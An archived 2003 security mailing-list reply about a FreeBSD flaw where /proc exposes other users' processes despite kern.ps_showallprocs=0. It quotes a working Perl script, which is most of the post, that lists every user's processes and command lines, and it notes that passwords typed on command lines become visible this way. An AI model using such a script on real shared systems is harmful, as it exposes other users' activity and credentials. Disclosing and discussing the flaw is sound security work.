On Sun, Jan 05, 2003 at 08:46:50PM +0000, Cache wrote:
> This is a little information leak. This bug(?) is not dangerous, but
> normal user can see all process on the box using ex. /bin/ps;
This topic was addressed on freebsd-security list a while back, where
someone also noted that all user process information can be obtained
by regular users even with the sysctl flag 'kern.ps_showallprocs' set simply
by looking at the contents of /proc. The following script was also
posted by someone to demonstrate this:
#!/usr/bin/perl
#
# hhp-sap_evade.pl ([s]how[a]ll[p]rocs) 02/03/2002
# author: JohnnyB
#
# a very basic tool that breaches the FreeBSD sysctl kern.ps_showallprocs=0
# option; an option that hides other users process information.
# (why would they implement such a broken and easily evaded option?)
# [and no this didnt take any skill. its basically an output format]
#
# Tested on FreeBSD 4.5-RC.
print "[USER] [GROUP] [PID] [FILE/ARGS]\n";
opendir(DIR,"/proc");
@procs=readdir(DIR);
closedir(DIR);
foreach ${proc} (@procs){
if(${proc}=~/[0-9]/o){
unshift(@pids, ${proc});
}
}
foreach $pid (@pids){
open(FD, "ls -al /proc/$pid/file|");
while(<FD>){
chomp;
${l}=$_;
${l}=~s/\s{1,}/ /g;
if(${l}=~/.*? 1 (\S+) (\S+) .*?\/proc\/${pid}\/file -> (\S+)/){
&ppid(${1},${2},${pid},${3});
}
}
close(FD);
}
exit(0);
sub ppid(){
(${a},${b},${c},${d})=@_;
undef(${str});
undef(${line});
if(-e "/proc/$c/cmdline"){
open(heh,"cat /proc/$c/cmdline|");
@hah=<heh>;
@chars=split(//,@hah[0]);
foreach ${chr} (@chars){
if(${chr}=~/[^a-zA-Z0-9\-_=\.\/\@\(\):\$#!&\*\+\|\"\'\;\[\]<>\?~`\^]/o){
${str}.=" ";
}else{
${str}.=${chr};
}
}
${line}.=${a};
while(length(${line})<11){${line}.=" ";} #alignment...
${line}.=" ".${b};
while(length(${line})<23){${line}.=" ";}
${line}.=" ".${c};
while(length(${line})<31){${line}.=" ";}
chop(${str});
if(${d}eq"unknown"){
${str}=~s/\s{1,}//g;
${line}.=" ("."${str}".")";
}else{
${line}.=" "."${str}";
}
@line=split(//,${line});
if(length(${line})>80){
${cntr}=0;
foreach ${char} (@line){
if((${cntr}==80)||(${cntr}==128)||(${cntr}==176)||(${cntr}==234)){
print "\n"." "x32; #^Anything >, deal with the rollover.
}
print "${char}";
${cntr}++;
}
print "\n";
}
else{
print "${line}\n";
}
return(0);
}
}
I believe someone (last poster in this thread?) also posted a patch on the same
list, freebsd-security.
It's annoying in that I see a lot of users running mysql with the -u and -p options:
mysql -u user -p mypassword
on the commandline, thinking that this info will not show up in ps listings when ps
is run by other users. Ho hum...
Regards,
Jez Hancock
This archive was generated by hypermail 2b30 : Mon Jan 20 2003 - 20:38:37 PST